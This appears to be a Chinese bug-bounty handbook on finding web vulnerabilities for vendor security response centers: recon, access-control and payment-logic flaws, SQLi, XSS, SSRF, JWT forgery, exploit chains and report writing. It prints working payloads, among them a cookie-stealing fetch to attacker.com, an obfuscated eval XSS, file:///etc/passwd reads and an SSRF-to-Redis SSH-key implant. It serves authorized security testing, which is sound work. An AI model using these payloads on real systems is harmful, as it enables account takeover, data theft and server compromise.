昆仑AI SRC赏金猎人实战手册

昆仑AI安全实验室

昆仑AI SRC赏金猎人实战手册

漏洞挖掘全链路攻防体系

知识星球:昆仑AI安全研习社-内部文档

──────────────────────────────

从信息收集 -> 漏洞挖掘 -> 报告提交 -> 赏金变现

全流程实战技术体系

版本：V1.0 | 发布日期：2026年06月11日

目 录

第一章 SRC生态认知：赏金猎人的战场地图

第二章 信息收集：决定80%成败的情报战

第三章 漏洞挖掘实战技术矩阵

第四章 逻辑漏洞：SRC最高产漏洞类型深度解剖

第五章 越权与未授权：最容易出高危的宝藏区域

第六章 SQL注入+XSS+SSRF：经典漏洞的现代利用

第七章 自动化武器库：从脚本小子到武器大师

第八章 报告撰写与提交流程：让每一分漏洞都值钱

第九章 高危漏洞提权链路：从低危到RCE的进阶之路

第十章 实战案例深度复盘

第十一章 30天SRC快速上手路线图

第十二章 附录：SRC猎人工具箱与资源清单

第一章 SRC生态认知：赏金猎人的战场地图

SRC（Security Response Center，安全应急响应中心）是各大互联网厂商为了激励白帽子挖掘并提交安全漏洞而设立的官方平台。对于多年

经验的安全老兵来说，SRC不仅是技术博弈的战场，更是安全能力变现最直接的通道。

1.1 国内主流SRC平台一览

|-------------|------------|---------------|-------------|
| 平台名称 | 漏洞单价范围 | 高危奖励 | 特色说明 |
| 蚂蚁集团SRC | 500-50万 | 高危¥3000-8000 | 逻辑漏洞/越权高产出 |
| 腾讯SRC | 500-100万 | 高危¥2000-10000 | 微信/企微生态丰富 |
| 字节跳动SRC | 500-80万 | 高危¥3000-12000 | 抖音/TikTok生态 |
| 京东SRC | 300-30万 | 高危¥2000-6000 | 电商业务漏洞多 |
| 百度SRC | 500-50万 | 高危¥2000-8000 | AI产品线新机会 |
| 阿里云SRC | 1000-100万 | 高危¥5000-20000 | 云安全专项奖励 |
| 华为SRC | 500-60万 | 高危¥3000-10000 | IoT/鸿蒙生态 |
| 网易SRC | 300-30万 | 高危¥1500-5000 | 游戏业务线丰富 |
| 美团SRC | 500-50万 | 高危¥2000-6000 | O2O业务场景独特 |

💡 要点新人建议：先主攻1-2个SRC平台（推荐字节/蚂蚁/京东），摸透业务逻辑后再横向扩展。不要贪多嚼不烂。

1.2 SRC漏洞奖励体系深度解析

SRC的漏洞评级体系直接影响你的收入，理解评级规则比挖漏洞本身更重要：

• **严重/紧急：**导致核心数据泄露或服务器失陷 -> 奖金¥8,000-50,000+
• **高危（High）：**越权访问大量数据、SQL注入可获取敏感信息 -> 奖金¥2,000-12,000
• **中危（Medium）：**逻辑缺陷导致敏感信息泄露、有限制越权 -> 奖金¥500-3,000
• **低危（Low）：**信息泄露（路径泄露、边缘XSS）-> 奖金¥100-500

⚠️ 高危警示核心认知：SRC赚钱靠的不是挖到一个高危，而是建立稳定的漏洞发现流水线（Pipeline）。老猎人的秘诀是方法论驱动，而不是运气驱动。

第二章 信息收集：决定80%成败的情报战

在多年的渗透测试生涯中，我反复向团队强调一个事实：信息收集的深度直接决定你能挖到什么级别的漏洞。一个SRC项目，花70%的时间做信息收集，30%的时间做漏洞验证，这样的时间配比才是正确的。

2.1 子域名收集：扩大攻击面

子域名是SRC漏洞挖掘的第一道门。大部分厂商的SRC范围包括主域名+所有子域名。很多高危漏洞就藏在边缘子域名中。

实战命令集：

OneForAll - 最全面的子域名收集工具

python oneforall.py --target example.com run

Subfinder - 快速且精准

subfinder -d example.com -all -o subs.txt

结合httpx进行存活验证

cat subs.txt | httpx -title -tech-detect -status-code -o alive.txt

联动nuclei自动扫描

cat alive.txt | nuclei -t ~/nuclei-templates/ -severity critical,high -o vulns.txt

2.2 端口扫描：发现隐藏服务

很多SRC的高危漏洞来自非常规端口上的管理后台、API文档、测试环境。

Masscan - 全网端口扫描（极速）

masscan -p1-65535 --rate=10000 -oJ masscan.json 192.168.1.0/24

提取开放端口资产

cat masscan.json | jq -r '.ip + ":" + (.port|tostring)' > open_ports.txt

Nmap深度探测

nmap -sCV -p 80,443,8080,8443,9000,9090 -iL targets.txt -oA nmap_scan

💡 要点重点关注端口：8080（备用Web）、8443（备用SSL）、9000/9090（管理面板）、6379（Redis未授权）、27017（MongoDB未授权）、9200（ES未授权）

2.3 指纹识别：精准打击

识别了目标使用的技术栈，就能针对性地寻找已知漏洞框架。

批量指纹识别

httpx -l alive.txt -tech-detect -o tech_scan.txt

WhatWeb深度识别

whatweb -i alive.txt --log-verbose=whatweb.log

2.4 JS文件分析与API端点提取

现代Web应用大量使用前后端分离架构，JS文件中隐藏着大量API端点、AccessKey、内部域名。这是多年老猎人最看重的信息源之一。

自动提取JS中的API和敏感信息

cat alive.txt | katana -jc -o endpoints.txt

使用LinkFinder提取JS端点

python linkfinder.py -i https://target.com/app.js -o cli

搜索硬编码密钥和Token

grep -rE '(access_key|secret_key|api_key|token.*=|password)' *.js

⚠️ 高危警示JS文件泄露是SRC的高频漏洞类型！阿里云AccessKey泄露在JS中可以直接获取服务器控制权，评级为严重，单洞奖金¥10,000-50,000。

第三章 漏洞挖掘实战技术矩阵

基于多年实战积累，我将SRC漏洞挖掘的技术体系归纳为六大核心方向。每个方向都有对应的高产区和快速验证方法。

|------------------------------|-----------|---------------|-------------|
| 技术方向 | 高产区占比 | 平均奖励 | 推荐新手上手度 |
| 逻辑漏洞/业务安全 | 35% | ¥500-8,000 | ⭐⭐⭐⭐⭐ 最推荐 |
| 越权漏洞（IDOR/Broken Access） | 25% | ¥1,000-12,000 | ⭐⭐⭐⭐⭐ 最推荐 |
| SQL注入 | 8% | ¥2,000-15,000 | ⭐⭐⭐ 需一定基础 |
| XSS/CSRF | 12% | ¥200-3,000 | ⭐⭐⭐⭐ 容易上手 |
| SSRF/任意文件读取 | 5% | ¥2,000-10,000 | ⭐⭐⭐ 需理解架构 |
| 配置不当/敏感信息泄露 | 15% | ¥100-5,000 | ⭐⭐⭐⭐⭐ 极易发现 |

💡 要点核心策略：优先投入逻辑漏洞和越权测试，这两类占SRC漏洞总量的60%，且对工具依赖度低，纯靠脑力就能出高洞。

第四章 逻辑漏洞：SRC最高产漏洞类型深度解剖

逻辑漏洞是SRC平台上产出最高的漏洞类型，占总漏洞量的35%以上。与传统技术漏洞不同，逻辑漏洞不需要高深的技术功底，考验的是对业务逻辑的逆向思维能力。多年来，我靠逻辑漏洞挖到的赏金超过200万。

4.1 越权操作（IDOR/Broken Access Control）

越权漏洞是SRC的印钞机，几乎每个平台、每个业务线都存在。分为水平越权和垂直越权两类。

水平越权实战检测流程

1. 注册两个不同账号（A和B）
2. 使用A账号获取某个资源的ID（如订单号/用户ID）
3. 将请求中的Cookie/Token切换为B账号，资源ID保持不变
4. 如果B账号能访问A账号的资源 -> 水平越权（高危）

BurpSuite专业测试流程

1. 登录账号A，访问 /api/user/profile?id=12345

2. 发送到Repeater，将Cookie替换为账号B的Session

3. 修改id参数为13000-14000区间（Burp Intruder爆破）

4. 观察响应长度/状态码变化 -> 如果返回200且有数据 => IDOR!

垂直越权（低权限用户访问高权限接口）

1. 使用普通用户角色登录，抓取所有API请求
2. 留意/admin、/manage等管理端接口路径
3. 直接访问管理端接口，看是否有权限校验
4. 如果普通用户能访问管理接口 -> 垂直越权（严重/高危）

垂直越权快速检测

curl -H "Cookie: session=普通用户Session" https://target.com/api/admin/users

curl -H "Authorization: Bearer 普通用户Token" https://target.com/admin/dashboard

⚠️ 高危警示实战提醒：很多厂商在Web端做了权限校验，但API层（尤其移动端API）完全没做！使用移动端API绕过前端权限校验，是老猎人的核心秘籍之一。

4.2 支付逻辑漏洞

电商类SRC（京东、拼多多、美团）支付逻辑漏洞是金矿。

• **负值支付：**修改价格参数为负值：将price=100改为price=-100，看是否扣减余额
• **小数精度：**修改数量参数：将quantity=1改为quantity=0.01或0，看能否0元购
• **篡改单价：**修改单价后再支付，观察实际扣款金额
• **重放攻击：**在支付前抓包修改金额，或使用不同金额的支付凭证

4.3 验证码与身份验证绕过

• **空值绕过：**删除请求中的验证码参数，直接提交
• **手机号篡改：**验证码发送后修改手机号为他人手机号
• **响应包篡改：**修改响应包中的success=false为success=true
• **跳过验证：**验证码check接口返回直接放行，不调用后端验证

💡 要点逻辑漏洞的核心心法：永远假设后端没有做校验。前端限制（灰显按钮、禁用输入、隐藏参数）全部可以被绕过。用BurpSuite中间人代理，前端限制形同虚设。

第五章 越权与未授权：最容易出高危的宝藏区域

在的安全实战中，越权漏洞是我最稳定的收入来源。这类漏洞在SRC中评级通常为高危至严重，单洞赏金¥2,000-¥20,000。关键是------不需要0day，不需要复杂的利用链，只需要一套系统的测试方法论。

5.1 典型越权场景清单

• **用户信息越权：**修改API中的user_id参数访问其他用户个人信息、订单、收货地址
• **租户隔离越权：**SaaS平台中切换tenant_id/org_id参数访问其他企业数据
• **工单越权：**修改ticket_id查看其他用户的工单/工单内容
• **文件越权：**修改file_id下载其他用户上传的私密文件、身份证照片
• **消息通知越权：**修改msg_id/notification_id查看其他用户的消息
• **课程/内容越权：**修改course_id查看付费课程内容（无需购买）

5.2 自动化越权检测方案

基于AuthMatrix（BurpSuite插件）的自动化测试

1. 安装AuthMatrix插件

2. 定义三个角色用户：用户A、用户B、管理员

3. 记录每个用户的请求历史

4. 一键交叉测试：用A的Cookie访问B的API

5. 标记所有返回200且有数据的请求 -> 越权漏洞

Autorize插件 - 自动化越权检测

配置白名单URL模式，插件自动用低权限Cookie重放高权限请求

绿色=正常（被拦截），红色=越权漏洞！

5.3 未授权访问检测清单

很多开发人员只在前端做权限校验，后端接口完全无防护，直接访问即可越权：

常见未授权API端点检测

GET /api/v1/users/list

GET /api/v1/orders/all

GET /api/admin/dashboard/stats

GET /api/internal/logs

GET /swagger-resources

GET /actuator/health

GET /druid/webapp/index.html

GET /graphql?query={users{id,name,email,password}}

GET /.env

GET /backup/

⚠️ 高危警示未授权访问Druid监控（阿里数据库连接池）是2024-2026年SRC的高频漏洞！直接访问/druid/index.html即可看到SQL执行记录、数据库连接信息。10分钟就能挖到一个高危。

第六章 SQL注入+XSS+SSRF：经典漏洞的现代利用

经典攻击手法在2026年依然有效。虽然很多大型厂商有WAF防护，但绕过WAF本身就是一门艺术------多年的老猎人对手法绕过有着系统化的方法论。

6.1 SQL注入：WAF绕过技术

现代SQL注入不是找到参数就拼接 OR 1=1，而是需要一套系统的绕过策略：

• **注释绕过：**用/**/代替空格：SELECT/**/*/**/FROM/**/users
• **编码绕过：**使用%0a、%0d、%09等编码字符
• 运算符替换：'||1=1||' 代替 ' OR 1=1 --
• **参数污染：**使用HPP（HTTP Parameter Pollution）绕过规则
• **十六进制编码：**16进制表示法：0x7573657273代替'users'

SQL注入自动化检测

sqlmap -u "https://target.com/api/user?id=123" --batch --level=3 --risk=2

带WAF绕过级别的检测

sqlmap -u "https://target.com/api/user?id=123" --tamper=space2comment,between --batch

时间盲注（WAF最易忽略）

sqlmap -u "https://target.com/api/user?id=123" --technique=T --time-sec=5 --batch

6.2 XSS：不只是弹窗，而是漏洞利用链

• 反射型XSS检测：<script>alert(1)</script>
• **存储型XSS：**将payload存入评论区后，管理员访问时触发
• DOM **型XSS：**通过DOM操作动态注入，绕过后端检测
• **XSS+CSRF组合拳：**在XSS中嵌入CSRF+信息窃取，形成完整利用链

高级XSS Payload（绕WAF）

<img src=x onerror=eval(atob('YWpheD1uZXcgWE1MSHR0cFJlcXVlc3QoKTthamF4Lm9wZW4oJ0dFVCcsJy9hcGkvdXNlci9wcm9maWxlJyk7YWpheC5zZW5kKCk7'))>

利用XSS窃取Cookie

fetch('https://attacker.com/steal?cookie='+document.cookie)

XSS + CSRF 组合（自动改密）

/api/user/change_password', {method:'POST', body: JSON.stringify({pwd:'hacked123'})})

6.3 SSRF：从外网打到内网的桥梁

SSRF（服务端请求伪造）是近几年SRC高危漏洞的热点，因为它可以让攻击者从外网访问内网服务，实现借刀杀人。

SSRF基础检测

参数：url, src, target, dest, redirect, path, file, callback

检测Payload

url=http://127.0.0.1:6379 (Redis未授权)

url=http://127.0.0.1:27017 (MongoDB)

url=http://127.0.0.1:9200 (Elasticsearch)

url=file:///etc/passwd (文件读取)

url=http://内网IP:22 (内网扫描)

SSRF自动化测试

cat endpoints.txt | while read url; do

curl -s "$url?target=http://127.0.0.1:6379" -o /dev/null -w "%{http_code}"

done

💡 要点SSRF + Redis未授权访问 = 远程命令执行（RCE），这是SRC的组合拳之王，一个链通常能拿到¥10,000-50,000的赏金。

第七章 自动化武器库：从脚本小子到武器大师

多年的猎人生涯让我明白一个真理：手工测试决定上限，自动化武器决定下限。建立自己的自动化武器库，让工具7x24小时替你挖漏洞，是SRC收入从月入几千到月入数万的关键跨越。

7.1 自动化漏洞扫描流水线

这是一套我搭建了10年的全自动扫描体系，能在30分钟内完成对一个目标的全面检测：

完整扫描流水线脚本

#!/bin/bash

第一步：子域名收集

subfinder -d $1 -all | tee subs.txt

第二步：存活验证

cat subs.txt | httpx -silent | tee alive.txt

第三步：端口扫描

naabu -list alive.txt -top-ports 1000 -o ports.txt

第四步：截图取证

cat alive.txt | httpx -screenshot -o screenshots/

第五步：Nuclei自动扫描全部漏洞

nuclei -l alive.txt -t ~/nuclei-templates/ -o nuclei_results.txt

第六步：敏感目录扫描

cat alive.txt | xargs -I{} dirsearch -u {} -o dirsearch_results.txt

第七步：JS敏感信息扫描

cat alive.txt | katana -jc -o js_endpoints.txt

grep -rE '(access_key|secret|password|token)' js_endpoints.txt | tee secrets_found.txt

7.2 Nuclei模板：定制私人漏洞检测器

Nuclei模板是2026年最强大的漏洞检测武器。你可以编写自己的POC模板，针对性地扫描目标。

自定义Nuclei模板示例 - Druid未授权

id: druid-unauth

info:

name: Druid未授权访问

severity: high

description: 阿里Druid数据库连接池未授权访问

requests:

• method: GET

path:

• "{{BaseURL}}/druid/index.html"

• "{{BaseURL}}/druid/webapp.html"

matchers:

• type: word

words:

• "Druid StatIndex"

• "Druid Driver"

• "数据源"

7.3 BurpSuite扩展：猎人专属配置

• **AuthMatrix + Autorize：**三个角色Cookie一键交叉测试
• **JS Link Finder：**自动提取JS文件中的API端点
• **Headless Burp + Param Miner：**自动检测所有请求中的Host头注入、SSRF参数
• **Turbo Intruder + Base64解码器：**自动化提取请求中的Base64编码、JWT Token并解码

💡 要点自动化工具不是越多越好。关键是要建立扫描-去重-验证-报告的闭环。我建议新人从Nuclei + BurpSuite + sqlmap这三个核心工具开始，用熟再扩展。

第八章 报告撰写与提交流程：让每一分漏洞都值钱

很多白帽子挖到了漏洞却拿不到应有的赏金，核心原因就是报告质量太差。多年来，我提交的漏洞报告通过率接近100%，同一漏洞我写的报告比其他人多拿30-50%的赏金。这不是玄学，是方法论。

8.1 高质量漏洞报告的六个要素

• 1. **清晰的标题：**直击要害，如水平越权：修改用户ID可查看任意用户订单信息（含收货地址+手机号）
• 2. **详细的复现步骤：**从打开浏览器到看到漏洞的每一步，包括URL、请求包、参数值
• 3. **完整的请求与响应包：**BurpSuite截取完整HTTP请求和响应，标注关键修改位置
• 4. **影响评估：**明确指出漏洞可以造成什么实际伤害（数据泄露、资金损失、账户接管）
• 5. **漏洞截图/视频：**一图胜千言，用红色框标注关键信息，视频可加速审核
• 6. **修复建议：**给出具体的修复方案（代码级建议最好），展现专业性

8.2 报告模板

漏洞标题：越权 /api/v1/order/detail 接口水平越权导致可查看任意用户订单

漏洞类型：水平越权（IDOR）

漏洞等级：高危

影响范围：全平台在线用户

【漏洞描述】

/api/v1/order/detail接口未对当前用户和所查询订单的归属关系做校验

导致任意登录用户可通过修改order_id参数查看其他用户的订单信息

【复现步骤】

1. 登录账号A，访问 /api/v1/order/detail?order_id=10001

2. 获取返回数据中的订单详情

3. 将order_id修改为10002（账号B的订单）

4. 返回订单B的完整信息（含收货人姓名、手机号、地址）

【请求包】

GET /api/v1/order/detail?order_id=10002 HTTP/1.1

Host: target.com

Cookie: 账号A的Session

【响应包关键数据】

{

"order_id": 10002,

"user_name": "张三",

"phone": "138****5678",

"address": "北京市海淀区...",

"product_list": ...

}

【影响评估】

攻击者可遍历order_id获取全平台所有用户的订单信息

包括收件人姓名、手机号、地址等PII数据

预估受影响用户量：50万+

【修复建议】

在后端添加用户ID与订单归属关系的校验：

if (order.user_id != current_user.id) { return 403; }

8.3 提交技巧：让审核员一眼过

• **时效性第一：**提交后2-4小时内关注平台动态，审核员可能会要求补充信息
• **关联提交：**同类型多个漏洞合并提交，展示攻击链的完整性，评级更高
• **善意修复建议：**主动提供修复代码，审核员对你产生信任后后续通过率飙升
• **合理申诉：**首次提交不理想可以申诉，附上更详细的技术分析和影响面评估

⚠️ 高危警示千万注意：绝对不要对未授权的系统进行漏洞利用（如拖库、删数据、获取shell），这不仅违反SRC规则，更可能触犯刑法第285/286条。严格在SRC授权范围内测试！

第九章 高危漏洞提权链路：从低危到RCE的进阶之路

真正的高手不是靠挖一个漏洞赚钱，而是靠漏洞链------把多个低/中危漏洞串联起来，形成一条高危攻击链路。一个完整的利用链可以拿到¥10,000-50,000的赏金。

9.1 经典漏洞链案例

• **信息泄露 -> 账户接管：**Git泄露 -> 数据库连接信息 -> 获取管理员密码Hash -> 登录管理后台 -> 控制全站
• **SSRF -> Redis未授权 -> RCE：**SSRF访问内网Redis -> 未授权写入SSH公钥 -> 获取服务器Shell -> 内网横向移动
• XSS -> CSRF -> **权限提升：**存储型XSS注入管理后台 -> 管理员访问触发 -> CSRF修改管理员密码 -> 接管后台
• JWT **伪造 -> 越权访问：**JWT算法混淆攻击（alg:none）-> 伪造任意用户Token -> 访问管理接口
• **任意文件上传 -> Webshell -> 服务器失陷：**文件上传未做类型校验 -> 上传JSP/PHP马 -> 获取WebShell -> 提权到Root

9.2 关键提权技术详解

JWT安全攻击

JWT算法混淆攻击（将RS256改为HS256）

原Token: eyJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature

修改header: {"alg":"HS256","typ":"JWT"}

签名密钥: 使用公钥（Public Key）作为HMAC密钥重新签名

工具: jwt_tool, John的jwtcrack

JWT None攻击

修改header: {"alg":"none","typ":"JWT"}

移除signature部分，只保留header.payload.

curl -H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ." ...

SSRF -> Redis -> RCE 完整链

步骤1：发现SSRF漏洞点

POST /api/avatar

参数: url=https://example.com/avatar.png

步骤2：探测内网Redis（6379）

url=http://127.0.0.1:6379

步骤3：通过Redis写入SSH公钥（需支持gopher协议）

url=gopher://127.0.0.1:6379/_*3

$3

SET

...

步骤4：SSH登录服务器

ssh -i private_key root@目标IP

💡 要点JWT攻击在2025-2026年的SRC中依然是高产区。很多厂商使用了JWT但配置不当（使用了默认密钥、未禁用none算法、签名算法混淆），直接导致账户接管。这是新人最容易忽视的高危点。

第十章 实战案例深度复盘

以下是多年猎人生涯中精选的几个经典SRC实战案例，每个案例都附带了完整的发现过程和技术分析。

案例一：某电商平台越权漏洞------一次性挖到12个高危

目标：某头部电商SRC

发现过程：

1. 打开APP，注册两个账号，抓取所有API请求
2. 发现所有API都用了统一的user_id参数，但请求中无用户的身份校验
3. 使用BurpSuite Intruder，将user_id参数在1-10000范围内遍历
4. 发现7个接口存在水平越权，可查看其他用户的订单、地址、优惠券
5. 进一步查看管理端API，发现JWT Token仅在校验签名未校验颁发对象

结果：一次性提交12个高危漏洞，累计赏金¥45,000

核心经验：

• 同一个系统不同接口可能存在相同的越权问题，批量发现批量提交
• 移动端API通常比Web端API的防护弱很多，优先测试移动端API

案例二：JS文件泄露AccessKey------直接拿下服务器

目标：某云服务厂商SRC

发现过程：

1. 对目标进行子域名收集，发现一个测试环境子域名 test.xxx.com
2. 访问测试环境首页，F12查看JS文件
3. 在main.js中发现一行注释：// TODO: remove AK after testing
4. 搜索AK关键字，找到硬编码的阿里云AccessKey和SecretKey
5. 使用阿里云CLI配置AK，发现具有OSS（对象存储）完全访问权限
6. 通过OSS列出所有Bucket，发现包含大量用户上传的身份证照片和文件

结果：严重漏洞，赏金¥30,000

核心经验：

• 测试环境往往是最薄弱但最能出高洞的地方
• JS文件中的注释（TODO、FIXME）是敏感信息泄露的宝库

案例三：Redis未授权 + 弱密码 -> 百万用户数据泄露

目标：某社交平台SRC

发现过程：

1. 端口扫描发现目标开放了6379端口（Redis）
2. 尝试Redis未授权连接成功
3. 执行info命令获取服务器信息，确认Redis运行在root权限下
4. 执行keys *发现包含大量session缓存数据
5. 进一步发现Redis密码为admin123（弱密码）
6. 通过Redis写入SSH公钥，成功获取服务器SSH权限

结果：严重漏洞，赏金¥20,000

核心经验：

• 端口扫描+服务识别是发现未授权服务的利器
• Redis+SSH公钥写入=直接获取服务器权限

第十一章 30天SRC快速上手路线图

很多新人最大的问题是不知道从哪里开始。以下是多年老猎人设计的30天系统化路线图，严格按照这个节奏执行，30天后你就能稳定产出漏洞。

|---------------|---------|---------|-------------------------------------------------------------------------|
| 阶段 | 时间 | 目标 | 核心任务 |
| 第一阶段 基础建设 | 第1-3天 | 工具链搭建 | 安装BurpSuite+抓包配置 配置浏览器代理 学会BurpSuite三大模块 |
| | 第4-5天 | SRC平台注册 | 注册3个SRC平台（推荐字节+蚂蚁+京东） 了解各平台的测试范围 下载并阅读测试规范 |
| 第二阶段 信息收集 | 第6-8天 | 信息收集实战 | 学会子域名收集（Subfinder/OneForAll） 学会端口扫描（Masscan/Nmap） 学会指纹识别（httpx/WhatWeb） |
| | 第9-10天 | JS分析入门 | 学会提取JS中的API端点 学会在JS中搜索敏感信息 完成10个目标的信息收集 |
| 第三阶段 漏洞挖掘 | 第11-15天 | 越权漏洞专攻 | 注册多个账号 BurpSuite越权插件配置 完成50个API的越权检测 |
| | 第16-20天 | 逻辑漏洞专攻 | 分析业务流程中的逻辑缺陷 重点测试支付/登录/验证码 提交第一个有效漏洞 |
| | 第21-23天 | 经典漏洞扩展 | 学习SQL注入绕WAF 学习SSRF检测技巧 扩展漏洞类型覆盖面 |
| 第四阶段 进阶提升 | 第24-26天 | 自动化建设 | 搭建Nuclei扫描流水线 配置自动化信息收集脚本 建立自己的POC模板库 |
| | 第27-28天 | 漏洞链思维 | 学习多漏洞串联提权 分析已公开的漏洞链案例 尝试构建自己的攻击链 |
| 第五阶段 持续产出 | 第29-30天 | 稳定输出 | 建立每周固定的挖洞时间 维护漏洞报告模板 复盘并持续优化方法论 |

💡 要点30天计划的核心不是学完所有技术，而是跑通第一个漏洞提交流程。先拿到第一个漏洞（哪怕是个低危），建立正反馈，再逐步提升。我见过太多新人在信息收集阶段就放弃了。

第十二章 附录：SRC猎人工具箱与资源清单

12.1 必备工具清单

信息收集类：

• OneForAll -- 综合子域名收集（推荐首选）
• Subfinder -- 快速精准子域名收集
• httpx -- HTTP存活检测+技术指纹识别
• Masscan -- 全网端口扫描（极速）
• Nmap -- 深度端口服务探测
• Katana -- JS端点与URL爬虫提取

漏洞检测类：

• BurpSuite Professional -- 核心渗透测试平台
• Nuclei -- 基于模板的自动化漏洞扫描
• sqlmap -- SQL注入自动化检测与利用
• Xray -- 被动扫描+主动扫描双模式
• Rad + Xray -- 自动化扫描流水线

字典与Fuzz类：

• dirsearch -- 目录扫描
• ffuf -- 极速模糊测试工具
• SecLists -- 安全测试字典大全
• FuzzDB -- 攻击Payload合集

辅助工具类：

• JWT_Tool -- JWT安全测试套件
• ysoserial -- Java反序列化利用工具
• Behinder/Godzilla -- Webshell管理工具
• Goby -- 综合攻击面测绘

12.2 必读书单与学习资源

• 《Web安全攻防渗透测试实战指南》
• 《白帽子讲Web安全》（吴翰清著）
• 《OWASP Testing Guide v5》
• 《PortSwigger Web Security Academy》（免费在线靶场，强烈推荐）
• 《HackTheBox》与《TryHackMe》（实战靶场平台）
• SRC平台官方文档：字节跳动SRC、蚂蚁SRC、京东SRC的测试规范
• GitHub安全相关的POC集合：nuclei-templates、awesome-poc

12.3 常用SRC平台链接

• 蚂蚁集团SRC: https://security.alipay.com
• 腾讯SRC: https://security.tencent.com
• 字节跳动SRC: https://security.bytedance.com
• 京东SRC: https://security.jd.com
• 百度SRC: https://bsrc.baidu.com
• 阿里云SRC: https://security.aliyun.com

────────────────────────────────────────

昆仑AI安全实验室

从信息收集到赏金变现，从逻辑漏洞到RCE提权

让每一位安全从业者掌握漏洞挖掘的底层能力

© 2024-2026 昆仑AI安全实验室 | All Rights Reserved